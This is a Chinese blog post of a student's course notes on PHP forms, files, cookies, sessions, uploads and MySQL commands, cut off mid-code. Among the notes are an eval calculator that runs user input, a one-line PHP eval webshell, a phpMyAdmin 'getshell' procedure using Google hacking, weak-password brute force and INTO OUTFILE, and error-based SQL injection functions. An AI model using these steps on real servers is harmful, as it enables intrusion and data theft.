<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-tw">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="PHP,Mysql,">





  <link rel="alternate" href="/atom.xml" title="Jaychouzzk's blogs" type="application/atom+xml">






<meta name="description" content="第四周周一PHP表单处理：    超全局变量$_POST   $_GET  $_REQUEST  他们都是数组 $_POST    提交表单  提交方式method=”POST”   提交name=”username” value=”1”    &amp;lt;input type=”submit” name=”submit”&amp;gt; 接收： $user=$_POST[&amp;quot;username&amp;quo">
<meta name="keywords" content="PHP,Mysql">
<meta property="og:type" content="article">
<meta property="og:title" content="php简陋实现wordpress安装流程">
<meta property="og:url" content="https://jaychouzzk.github.io/2018/12/23/第四周笔记/index.html">
<meta property="og:site_name" content="Jaychouzzk&#39;s blogs">
<meta property="og:description" content="第四周周一PHP表单处理：    超全局变量$_POST   $_GET  $_REQUEST  他们都是数组 $_POST    提交表单  提交方式method=”POST”   提交name=”username” value=”1”    &amp;lt;input type=”submit” name=”submit”&amp;gt; 接收： $user=$_POST[&amp;quot;username&amp;quo">
<meta property="og:locale" content="zh-tw">
<meta property="og:updated_time" content="2018-12-23T07:36:26.069Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="php简陋实现wordpress安装流程">
<meta name="twitter:description" content="第四周周一PHP表单处理：    超全局变量$_POST   $_GET  $_REQUEST  他们都是数组 $_POST    提交表单  提交方式method=”POST”   提交name=”username” value=”1”    &amp;lt;input type=”submit” name=”submit”&amp;gt; 接收： $user=$_POST[&amp;quot;username&amp;quo">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://jaychouzzk.github.io/2018/12/23/第四周笔记/">





  <title>php简陋实现wordpress安装流程 | Jaychouzzk's blogs</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-tw">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Jaychouzzk's blogs</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            歸檔
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://jaychouzzk.github.io/2018/12/23/第四周笔记/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Jaychouzzk">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Jaychouzzk's blogs">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">php简陋实现wordpress安装流程</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="創建於" itemprop="dateCreated datePublished" datetime="2018-12-23T14:58:31+08:00">
                2018-12-23
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="第四周"><a href="#第四周" class="headerlink" title="第四周"></a>第四周</h2><h2 id="周一"><a href="#周一" class="headerlink" title="周一"></a>周一</h2><p>PHP表单处理：<br>    超全局变量$_POST   $_GET  $_REQUEST  他们都是数组</p>
<p>$_POST<br>    提交表单  提交方式method=”POST”   提交name=”username” value=”1”<br>    &lt;input type=”submit” name=”submit”&gt;</p>
<pre><code>接收：
$user=$_POST[&quot;username&quot;]
$submit=$_POST[&quot;submit&quot;]


跳转：
PHP跳转    header(&quot;Location: login.php&quot;);
JS跳转 echo &apos;&amp;lt;script&amp;gt;location.href=&quot;install.php&quot;;&amp;lt;/script&amp;gt;&apos;
</code></pre><p>$_GET:<br>    发送<br>    &lt;a href=””&gt;登录&lt;/a&gt;</p>
<pre><code>接收  :
$id=$_GET[&apos;name&apos;]
echo $id;
</code></pre><p>$_REQUEST:  能接收POST和GET两种数据</p>
<p>PHP文件操作（filesystem函数）：</p>
<pre><code>fread()函数读取打开的文件
fwrite（）函数写入一个打开的文件
unlink（）函数删除文件
is_dir检查文件是否是目录
is_file()检查是否常规文件
file_exists（）检查文件是否存在
copy（）复制文件
rename（）重命名文件或目录
file_get_contents(文件名)  读取整个文件内容，***打开远程文件***

php://filter file_get_contents()

echo file_get_contents(&quot;http://www.baidu.com&quot;)
file_put_contents(文件名)   覆盖写入文件

$f=fopen(&apos;login.php&apos;,&apos;r&apos;);//打开一个文件   指向开头
echo fgets($f);                                   //读一行
feof($f)             ;                                 //检测是否到文件末尾

while (!feof($f)){                                  //用while循环输出文件内容  直到文件末尾
    echo fgets($f);                                 //输出每行的内容
}
fclose($f);
</code></pre><p>PHP文件打开方式<br>    r    只读，在开头开始<br>    r+    读写，在开头开始<br>    w    只写，清空内容，如果不存在创建新文件<br>    w+    读写，清空文件，不存在则创建新文件<br>    a    追加    在末尾进行写操作，可以创建新文件<br>    a+    读或追加    末尾写内容<br>    x    只写（新建）<br>    x+    读写（新建）</p>
<pre><code>//X-Forwarded-For火狐的header插件（记录网站IP）
//display_error关闭网站就不会报错
</code></pre><p>PHP中的代码执行：</p>
<pre><code>eval(&quot;&quot;)
例子：eval(&quot;echo 123;\$a=&apos;aaa&apos;;&quot;);
</code></pre><p>echo $a;<br>    //结果123aaa</p>
<pre><code>eval(&quot;\$a=Array();&quot;);    //字符串转换成代码执行
print_r($a);

preg_replace(&quot;a/123/e&quot;,&apos;$c=123&apos;,&quot;abab&quot;);
//第一个路径后有e  则第二个代码能被执行

$func = create_function(&apos;&apos;,&apos;代码&apos;)


$_GET[&apos;a&apos;]($_GET[&apos;b&apos;]);
</code></pre><p>课堂实验：制作一个eval计算器</p>
<pre><code>&amp;lt;form action=&quot;&quot; method=&quot;post&quot;&amp;gt;
请输入要计算的内容：
&amp;lt;input type=&quot;text&quot; name=&quot;eval&quot; value=&quot;Rg:1+2-3&quot;&amp;gt;
&amp;lt;input type=&quot;submit&quot;&amp;gt;
&amp;lt;/form&amp;gt;

&amp;lt;?php
@$eval=($_POST[&apos;eval&apos;]);
if ($eval){
    @eval(&quot;\$res=$eval;&quot;);
    echo &quot;结果是：$res&quot;;
}
?&amp;gt;
</code></pre><p>PHP命令执行：<br>    exec(“dir-l ~/“,$output);    //output用来反馈结果<br>    print_r（$output）;</p>
<pre><code>system(&quot;命令&quot;)        //不需要接收

@output=shell_exec(&quot;whoami&quot;,$output);
print_r($output);

popen()    打开一个进程
</code></pre><p>$_GET<a href="$_GET[&#39;b&#39;]">‘a’</a></p>
<p>5.6以下     a = assert&amp;b = phpinfo()</p>
<p>7    a = assert&amp;b = phpinfo()   会报assert参数错误，不能为动态变量</p>
<p>file操作</p>
<p>fopen          打开方式： r   w   a   x  </p>
<p>fclose         关闭文件</p>
<p>fgets         获取一行的数据</p>
<p>feof        判断是否到文件结尾</p>
<p>结合while读取内容</p>
<p>while(!feof($f)){ echo $fgets($f);}</p>
<p>fread         读取文件内容，需要指定$f的长度</p>
<p>fwrite         写内容，需要指定$f和写入字符串</p>
<p>is_file     is_dir     file_exists</p>
<p>unlink         copy     remname</p>
<p>file_get_contents (‘./data/123.txt’);<br>file_get_contents (‘./data/123.txt’,’abcdef’);</p>
<p>eval </p>
<p>eval(‘echo 123;’)     eval(“$a = 123;”)   eval(“\$arr = [‘name’=&gt;zs]”)</p>
<p>计算器：<br>        eval(“\$res = $_POST[‘str’];”)    echo $res;</p>
<p>执行系统命令的函数：<br>exec<br>exec(‘dir’,$output);<br>print_r($output);</p>
<p>system<br>system(‘whoami’);         </p>
<p>shell_exec<br>$outpu = shell_exec(‘ipconfig’);<br>print_r($outpu);    </p>
<p>popen(有小问题)<br>$f = popen(“dir”,”r”);<br>echo fread($f , 1000);<br>pclose($f);</p>
<hr>
<h2 id="周二"><a href="#周二" class="headerlink" title="周二"></a>周二</h2><p>文件包含：</p>
<p>include ‘show.php’;//只会警告，脚本继续<br>require ‘show.php’;//会产生致命错误，停止脚本</p>
<p>include_once<br>require_once</p>
<p>include  在php文件开始运行的时候就包含，复制的位置还是关键字的地方<br>require  在执行到require关键字的时候才包含</p>
<p>一般用于包含导航栏，包含配置文件</p>
<p>Cookie：</p>
<p>setcookie(name,value,expire:time()+过期时间);</p>
<p>防止伪造cookie</p>
<h2 id="生成cookie"><a href="#生成cookie" class="headerlink" title="生成cookie"></a>生成cookie</h2><p>$tmp = rand(1,1000);</p>
<p>$tmp = $uname . $tmp . time();</p>
<p>$tmp = md5($tmp);</p>
<p>$f = fopen($tmp, ‘a’);</p>
<p>fwrite($f,$uname);</p>
<p>fclose($f);</p>
<h2 id="setcookie-‘id’-tmp-time-50"><a href="#setcookie-‘id’-tmp-time-50" class="headerlink" title="setcookie(‘id’, $tmp, time()+50);"></a>setcookie(‘id’, $tmp, time()+50);</h2><h2 id="校验cookie"><a href="#校验cookie" class="headerlink" title="校验cookie"></a>校验cookie</h2><p>@$id = $_COOKIE[‘id’]</p>
<p>if(file_exists(‘./data/session_’ . $id)){</p>
<pre><code>$f = fopen(&apos;./data/session_&apos; . $id , &apos;r&apos;);

$uname = fgets($f);

fclose($f);
</code></pre><p>}</p>
<hr>
<p>Session     $_SESSION（超全局变量，信息存储于服务器硬盘当中）：</p>
<hr>
<p>session_start()            //启用session</p>
<p>$_SESSION[‘name’] = ‘zs’        //存入用户名</p>
<p>if(isset($_SESSION[‘name’])){<br>    //判断是否存在<br>}</p>
<p>session_destroy()    //清空session缓存</p>
<p>跳转：<br>header(“Location: show.php”);</p>
<p>&lt;script&gt;location.href=’show.php’&lt;/script&gt;</p>
<p>&lt;script&gt;location.navigate=’show.php’&lt;/script&gt;//待测</p>
<p>&lt;script&gt;top.location=’show.php’&lt;/script&gt;</p>
<p>&lt;script&gt;self.location=’show.php’&lt;/script&gt;</p>
<p>&lt;script&gt;location.replace=’show.php’&lt;/script&gt;</p>
<h2 id="lt-meta-http-equiv-refresh-content-0-URL-’show-php’-gt"><a href="#lt-meta-http-equiv-refresh-content-0-URL-’show-php’-gt" class="headerlink" title="&lt;meta http-equiv=refresh content=0;URL=’show.php’&gt;"></a>&lt;meta http-equiv=refresh content=0;URL=’show.php’&gt;</h2><h2 id="上传文件："><a href="#上传文件：" class="headerlink" title="上传文件："></a>上传文件：</h2><p>&lt;form enctype=”multipart/form-data” method=”post”&gt;<br>    &lt;input type=”file” name=””&gt;<br>    &lt;input type=”submit”&gt;</p>
<h2 id="lt-form-gt"><a href="#lt-form-gt" class="headerlink" title="&lt;/form&gt;"></a>&lt;/form&gt;</h2><p>if (isset($_FILES[‘filename’])){<br>    if($_FILES[‘filename’][‘error’] == 0){<br>        echo ‘文件的名字是：’ . $_FILES[‘filename’][‘name’] . “&lt;br&gt;”;<br>        echo ‘类型是：’ . $_FILES[‘filename’][‘type’] . “&lt;br&gt;”;<br>        echo ‘大小是：’ . $_FILES[‘filename’][‘size’] . “&lt;br&gt;”;<br>        echo ‘临时目录是：’ . $_FILES[‘filename’][‘tmp_name’] . “&lt;br&gt;”;</p>
<p>读写    //$data = file_get_contents($_FILES[‘filename’][‘tmp_name’]);<br>        //file_put_contents(‘./data/‘ . $_FILES[‘filename’][‘name’],$data);</p>
<p>拷贝        //copy($_FILES[‘filename’][‘tmp_name’],’./data/‘ . $_FILES[‘filename’][‘name’]);</p>
<p>一般是用剪切，而不用copy和读写<br>剪切     $ok = move_uploaded_file($_FILES[‘filename’][‘tmp_name’],’./data/‘ . $_FILES[‘filename’][‘name’]);</p>
<pre><code>    if ($ok){
        echo &apos;上传的路径为：./data/&apos; . $_FILES[&apos;filename&apos;][&apos;name&apos;];
    }else{
        echo &apos;上传失败&apos;;
    }

}else{
    echo &apos;上传失败&apos;;
    die();
}
</code></pre><p>}</p>
<hr>
<hr>
<p>数据库:一个用来存放数据的服务，或者平台。要么以结构化（数据库、表、数据）的形式存在，要么以非结构化（key =&gt; value）的形式存放。</p>
<p>结构化：<br>学生库（stu_db）–&gt;学生表（stu_table）–&gt;id、  name、  number、  class<br>                                        1      hu     21100       95<br>                                        2      xi     21351    96</p>
<p>非结构化：<br>students_1.txt<br>id = 1<br>name = hu<br>number = 21100<br>class = 95</p>
<p>mysql(轻量级开源数据库，适用于中小型企业，性能较好)<br>sql server(微软开发的，适用于大中型企业，需要微软的系统作为支撑，不支持跨平台)<br>oracle(收费，适用于大型企业，可跨平台，需要硬件配置高)</p>
<p>数据库模型：<br>    关系型数据库（结构化）：mysql/mssql    oracle    DB2<br>    非关系型数据库（非结构化）：redis    mongodb    hbase neo4j nosql</p>
<p>PHPstudy(WAMP)  mysql  配置环境变量</p>
<p>dos窗口登陆mysql  -&gt;  mysql -h -uroot -proot</p>
<p>mysql交互窗口<br>mysql-front    开源的数据库管理器<br>phpmyadmin    基于网页的数据库管理器</p>
<p>mysql默认端口3306<br>打开数据库管理器，数据库–&gt;数据表–&gt;字段（表头）<br>表中有几个字段就有几列数据<br>一行数据     专业称为 记录</p>
<p>mysql基础命令：<br>    mysql -h ip -u 用户名 -p 密码<br>    show databases;        查看所有数据库<br>    use test;            使用指定数据库<br>    show tables;        查看数据库内的表</p>
<pre><code>select * from news;    从news表中查看所有的数据内容
        select      查看数据
        *            表示所有字段
        from news   从* *表中去获取数据
</code></pre><p>mysql修改密码：<br>        低版本（5.x）</p>
<pre><code>高版本（8.x）
    ALTER USER &quot;root&quot;@&quot;localhost&quot; IDENTIFIED  BY &quot;你的新密码&quot;;
</code></pre><p>mysql默认情况下不允许外连，也就意味使用mysql-front、navicat是无法连接到数据库的</p>
<hr>
<p>mysql外连：<br>    （1）改表法<br>            update user set host = “%” where user = “root” and host = “localhost”;//修改数据表<br>    （2）</p>
<hr>
<p>mysql函数：</p>
<pre><code>select version();    显示数据库的版本信息

select user();        当前用户
select current_user()/session_user()/system_user();

mid();                 用来截取字符串中的一部分    mid(&quot;ichunqiu&quot;,0,2)
ord();                用来显示字符的ASCII码        
concat();            用来拼接字符串
concat_ws();        使用分隔符来拼接字符串
group_concat();        和concat类似，拼接并分组显示数据
select databases()/schema();    查看当前数据库
select @@hostname;    获取计算机名称
select @@tmpdir;    获取临时文件目录路径
select @@datadir;    真正存放数据的路径
select @@version;    版本
select @@basedir;    数据库所在位置
</code></pre><hr>
<p>创建数据库<br>    create database ichunqiu;        //交互式窗口<br>    mysqladmin -uroot -proot create ichunqiu2    //dos窗口</p>
<hr>
<p>删除数据库<br>    drop database ichunqiu;<br>    mysqladmin -uroot -proot drop ichunqiu2</p>
<hr>
<p>选择使用哪个数据库<br>    use 数据库名称</p>
<hr>
<p>数据类型：<br>    int，float，date，time，timestamp（时间戳），char，varchar，text</p>
<hr>
<p>创建表<br>    create table stu(id int , name varchar(10));<br>    create table 表名（字段名1 类型1，字段名2 类型2，……）;<br>    show create table stu;<br>    desc 表名</p>
<p>查看字段<br>    show create table 表名;<br>—-注意：IF NOT EXISTS 表示如果创建的表不存在就执行后续sql语句—-<br>    <code></code>–&gt;上引号</p>
<hr>
<p>插入数据<br>    insert into 表名 (字段1，字段2，字段3…,字段名n) value(value1,value2,….,valuen)<br>    —字段1对应value1—</p>
<hr>
<p>查询数据<br>    select 字段名1，字段名2,……，字段名n from 表名；<br>    select <em> from 表名；<br>    select username,password from users where id=1;（单条件）<br>    select </em> from stu where number=311009050115 and name=huqianwei;(多条件)<br>    select 字段名1，字段名2，….，字段名n from 表名 limit 0,1;<br>    –limit a,b  是用来限制读取记录，a是索引，b表示读取的行数–</p>
<hr>
<p>更新数据<br>    update 表名 set 字段名=新值1，字段名2=新值2，…,字段名n=新值n;<br>    update 表名 set 字段名=新值1，字段名2=新值2，…,字段名n=新值n where;</p>
<hr>
<p>删除数据<br>    delete from 表名 where 条件 ；<br>    delete from 表名;                删除表中所有数据</p>
<hr>
<p>like子句</p>
<pre><code>* 表示任意的字符
% 表示任意的字符
? 表示一个字符
select * from stu where 字段名 like &quot;字符串&quot;；
</code></pre><hr>
<p>union 联合查询<br>    select <em> from 表1 union select </em> from 表2;<br>    注意:表1和表2中字段个数要保持一致</p>
<hr>
<p>order by 条件   根据条件排序<br>    select * from 表名 order by 字段名 asc/desc;<br>    —asc 升序，desc 降序—<br>    order by n ,按照第n列的数据进行排序，如果n超过了字段数量是，就会报错 </p>
<hr>
<p>group by  对结果进行分组</p>
<hr>
<p>删除字段<br>    alter table 表名 drop 字段名;  在表中将某个字段删掉</p>
<p>修改字段<br>    alter table 表名 modify 字段名 字段类型;</p>
<p>添加字段<br>    alter table 表名 add 字段名1 字段类型1,add 字段名2 字段类型2;        在表中增加某个字段</p>
<hr>
<p>修改表名<br>    alter table 原表名 rename to 新表名;</p>
<hr>
<p>mysql导入数据<br>    (1)mysql -u 用户名 -p 密码 &lt; 要导入的数据库数据<br>    注意：runoob.sql中要自动创建数据库<br>    如果runoob.sql中不会自动创建数据库，需要执行如下的步骤：<br>            step1：登录数据库mysql -u用户名 -p密码<br>            step2：选择数据库        use mysql;<br>            step3：source 绝对路径<br>    (2)mysqlimport -u root -p –local database_name dump.txt<br>    注意：dump.txt不会创建数据库时，需要database_name</p>
<hr>
<p>mysql导出数据<br>    select * from news into outfile “绝对路径”;<br>    show global variables like ‘%secure_file_priv%’;<br>        临时修改：set global secure_file_priv=’’;<br>        (1)为null时，表示mysql不允许导入导出<br>        (2)为路径时，只允许在路径中导入导出<br>        (3)为无值时，表示不做限制</p>
<hr>
<p>脱裤：<br>    mysqldump -uroot -proot test&gt;D://database.sql<br>脱裤中的表：<br>    mysqldump -uroot -proot mysql stu &gt;D://database2.sql</p>
<hr>
<p>通过phpmyadmin 来获取服务器权限：<br>    step1：首先通过Googlehacking找到phpmyadmin的网站<br>    step2：爆破、弱口令，登录，查看权限，show global variables like     ‘%secure_file_priv%’;<br>    step3：select “&lt;?php eval($_POST[‘pass’]);?&gt;” into outfile “G://“,注意写入木马的路径</p>
<hr>
<p>选择数据的高级用法：<br>    order by 数字; —-&gt;可以用来暴字段数<br>    select 1+1#1+1;<br>    select 1+1;–1+1</p>
<pre><code>select connection_id();   用户连接数

select insert(被替换的的字符串,索引,长度,替换的字符串);
select left(被截取的字符串，截取的长度);   向左截取
select right(被截取的字符串，截取的长度);   向右截取

select substring/mid/substr();    都是三个参数，第一个被截取的字符串，第二个是开始位置，第三个是截取的长度    
select sleep(5);  让数据库等待5s后返回0
</code></pre><hr>
<pre><code>2个报错函数
extractvalue(XML_document，XPath_string):
    第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
    第二个参数：XPath_string(Xpath格式为字符串)
    作用：从目标XML中返回包含所查询值的字符串
    select * from user where user=&apos;root&apos; and extractvalue(1,concat(0x7e,(select user()),0x7e));
    ERROR 1105 (HY000): XPATH syntax error: &apos;~root@localhost~&apos;

    select * from user where user=&apos;root&apos; and extractvalue(1,concat(0x7e,(select @@datadir),0x7e));
    ERROR 1105 (HY000): XPATH syntax error: &apos;~D:\phpstudy\PHPTutorial\MySQL\d&apos;

    concat(0x7e,(select user()),0x7e)


updatexml(xml_document,xpath,)
    第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc 
    第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。 
    第三个参数：new_value，String格式，替换查找到的符合条件的数据 
    作用：改变文档中符合条件的节点的值

    select * from user where user =&apos;root&apos;and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

    ERROR 1105 (HY000): XPATH syntax error: &apos;~root@localhost~&apos;
</code></pre><hr>
<p>distinct去重：<br>    SELECT  DISTINCT 字段 FROM 表名 WHERE 条件；</p>
<p>group_concat把查询结果连接到一起：<br>    SELECT  group_concat(DISTINCT 字段) FROM 表名 WHERE 条件 ；<br>    SELECT  group_concat(字段，字段) FROM 表名 WHERE 条件 ；</p>
<hr>
<hr>
<h2 id="ubuntu16-mysql"><a href="#ubuntu16-mysql" class="headerlink" title="ubuntu16  mysql "></a>ubuntu16  mysql </h2><p>安装：</p>
<pre><code> 安装的时候会提示要设置root密码，如果你没有在卸载的时候去清理残留数据是不会提示你去设置root密码的 ，我的就没提示，可以用上面的方法修改密码
sudo apt-get install mysql-client mysql-server

#检查mysql是不是在运行
sudo service mysql status
#一般安装完成之后都是会自动运行的，如果没有运行可以start
sudo service mysql start
</code></pre><hr>
<p> 修改密码：</p>
<pre><code>update user set authentication_string=PASSWORD(&quot;密码&quot;) where user = &quot;root&quot;;
update user set plugin=&quot;mysql_native_password&quot;;
flush privileges;
quit;
</code></pre><p>重启mysql</p>
<pre><code>/etc/init.d/mysql restart;
</code></pre><hr>
<p>卸载mysql：</p>
<pre><code>sudo apt purge mysql-*
sudo rm -rf /etc/mysql/ /var/lib/mysql
sudo apt autoremove
</code></pre><hr>
<hr>
<p>PHP连接mysql数据库</p>
<pre><code>(1)使用mysqli去连接
mysqli_connect(&quot;IP&quot;,&quot;pwd&quot;)


create table if not exists `te`(`id` int auto_INCREMENT,`name` varchar(100) not null,`age` int(100) not null,`gender` bool,PRIMARY KEY (`id`))
</code></pre><hr>
<h2 id="周四"><a href="#周四" class="headerlink" title="周四"></a>周四</h2><p>往表中插入数据：</p>
<pre><code>    insert into 表名称(字段1，字段2...) value(字段1的值，字段2的值...)
例子：insert into news(title,content) value(&apos;标题&apos;,&apos;内容‘)；
</code></pre><p>查询数据：</p>
<pre><code>select 字段名1,字段名2,...,字段名n from 表名称

select username,password from user where id =1;单条件

select * from stu where number=31100 and name=hu;多条件用and连接

select 字段1，字段2，字段n from 表名 limit 0,1；用limit加限制条件 从0开始读1条

limit a,b  limit---限制读取记录   a---索引  b----记录数
</code></pre><p>更新：</p>
<pre><code>update 表名 set 字段1=新值1，字段2=新值2 条件；
</code></pre><p>删除表：</p>
<pre><code>delete from 表名 条件；一定要加好条件，否则都删了

delete from 表名；清空一个表
</code></pre><p>like子句：</p>
<pre><code>通配符：
    *表示任意的字符
    %表示任意的字符
    ？表示任意一个字符
    select * from 表名  where name like &apos;%sd&apos;;
</code></pre><p>union***    联合查询</p>
<pre><code>select * from 表1 union select * from 表2；把表1和表2内容放在一起展示
注意：表1和表2中字段个数要保持一致，否则会报错
</code></pre><p>order by 条件***    根据条件排序</p>
<pre><code>select * from user where city =&apos;beijng&apos; order by name;
ASC（升序） 或DESC（降序）默认升序
order by 1\2\3.。。 根据第几列来排序，如果超过列数就会报错*****
</code></pre><p>group by 根据一个或多个列对结果进行分组，常和count sum、AVG组合使用</p>
<pre><code>select name，count（*）from  emply by name；根据名字来给表分组；
</code></pre><p>删除字段：<br>        alter table 表名  drop 字段名；在表中将某个字段删除</p>
<p>增加字段：<br>        alter table 字段名 add 字段名 字段类型</p>
<p>改字段：<br>        alter table to modify 字段名 字段类型;</p>
<p>改表名：<br>        alter table 原表名 rename to  新表名;</p>
<p>导入数据：</p>
<pre><code>方法1.mysql -uroot -p 密码 &amp;lt; 要导入的数据（注意：.sql中要自动创建数据库，如果runoob.sql中不会自动创建数据库，需要用第二种方法）

方法2.登录mysql，use数据库，source 路径文件

方法3.mysqlimport -uroot -p --local database_name dump.txt dump.txt（注意：dump.txt不会创建数据库时，需要database_name）
</code></pre><p>导出数据：</p>
<pre><code>方法1.select * from 表名 into outfile 文件路径；


在此导出权限查询：show gloval variables like  &apos;%secure%&apos;; 
在mysql.ini中添加一句话secure_file_priv=
或者临时修改权限set global secure_file_priv=&apos;&apos;;

通过phpmyadmin来获取服务器权限：（getshell）

step1：首先通过google hacking找到phpmyadmin网站

step2：想办法登录进phpmyadmin，弱口令登录
show global variables like ‘%secure_file_priv%&apos;;判断是否有权限写入文件

step3：select ’&amp;lt;?php eval($_POST[_]);?&amp;gt;&apos; into outfile &apos;g://re2.txt&apos;； 注意些木马的路径   一般是/var/www/html/

方法2.在cmd中mysqldump -uroot -p test&amp;gt;./database.sql

mysqldump -u用户名 -p密码  数据库名 表名 &amp;gt;路径
</code></pre><p>注释<em>**</em>注入</p>
<pre><code>#（%23） --  注释当前行
/*  */      中间注释
</code></pre><p>查询用户连接数</p>
<pre><code>select connection_id();
</code></pre><p>替换字符        </p>
<pre><code>例子
    select insert(&apos;ichunqiu&apos;,1,1,&apos;kk&apos;);结果是kkchunqiu
</code></pre><p>截取字符串</p>
<pre><code>例子
    select LEFT(&quot;helloworld&quot;,5);结果是hello
    select LEFT（被截取的字符串，左截取长度）;
    select RIGHT 同理

截取
    select substring()/mid()/substr()都是三个参数，第一个：被截取的字符串，第二个：开始的位置，第三个：截取的长度
</code></pre><p>休息命令</p>
<pre><code>select sleep(时间秒)
例子select sleep（5）;返回0    //让服务器等待5秒后返回0
</code></pre><p>2个报错函数***  一般情况下要放在条件后面</p>
<pre><code>1.extractvalue(XML_document，XPath_string)；
例子：
select * from news where tid=1 and extractvalue(1,concat(0x7e,(select user()),0x7e));
两个参数（1，拼接的第二个报错参数）

2.UPDATEXML (XML_document, XPath_string, new_value); 
updatexml（1，拼接参数，1）；
</code></pre><p>去重函数<br>        select distinct title from news;不显示重复函数</p>
<p>把查询结果连接在一起</p>
<pre><code>group_concat(DISTINCT field) from table_name where conditions;
</code></pre><p>PHP连接mysql数据库</p>
<pre><code>方法1：使用mysqli扩展连接(面向对象)
&amp;lt;?php
$dbhost = &apos;localhost:3306&apos;;  // mysql服务器主机地址
$dbuser = &apos;root&apos;;            // mysql用户名
$dbpass = &apos;123456&apos;;          // mysql用户名密码
$conn = mysqli_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{
    die(&apos;连接失败: &apos; . mysqli_error($conn));
}
// 设置编码，防止中文乱码
mysqli_query($conn , &quot;set names utf8&quot;);

$sql = &apos;SELECT runoob_id, runoob_title, 
        runoob_author, submission_date
        FROM runoob_tbl&apos;;

mysqli_select_db( $conn, &apos;RUNOOB&apos; );
$retval = mysqli_query( $conn, $sql );
if(! $retval )
{
    die(&apos;无法读取数据: &apos; . mysqli_error($conn));
}
echo &apos;&amp;lt;h2&amp;gt;菜鸟教程 mysqli_fetch_array 测试&amp;lt;h2&amp;gt;&apos;;
echo &apos;&amp;lt;table border=&quot;1&quot;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;教程 ID&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;标题&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;作者&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;提交日期&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&apos;;
while($row = mysqli_fetch_array($retval, MYSQLI_ASSOC))
{
    echo &quot;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt; {$row[&apos;runoob_id&apos;]}&amp;lt;/td&amp;gt; &quot;.
         &quot;&amp;lt;td&amp;gt;{$row[&apos;runoob_title&apos;]} &amp;lt;/td&amp;gt; &quot;.
         &quot;&amp;lt;td&amp;gt;{$row[&apos;runoob_author&apos;]} &amp;lt;/td&amp;gt; &quot;.
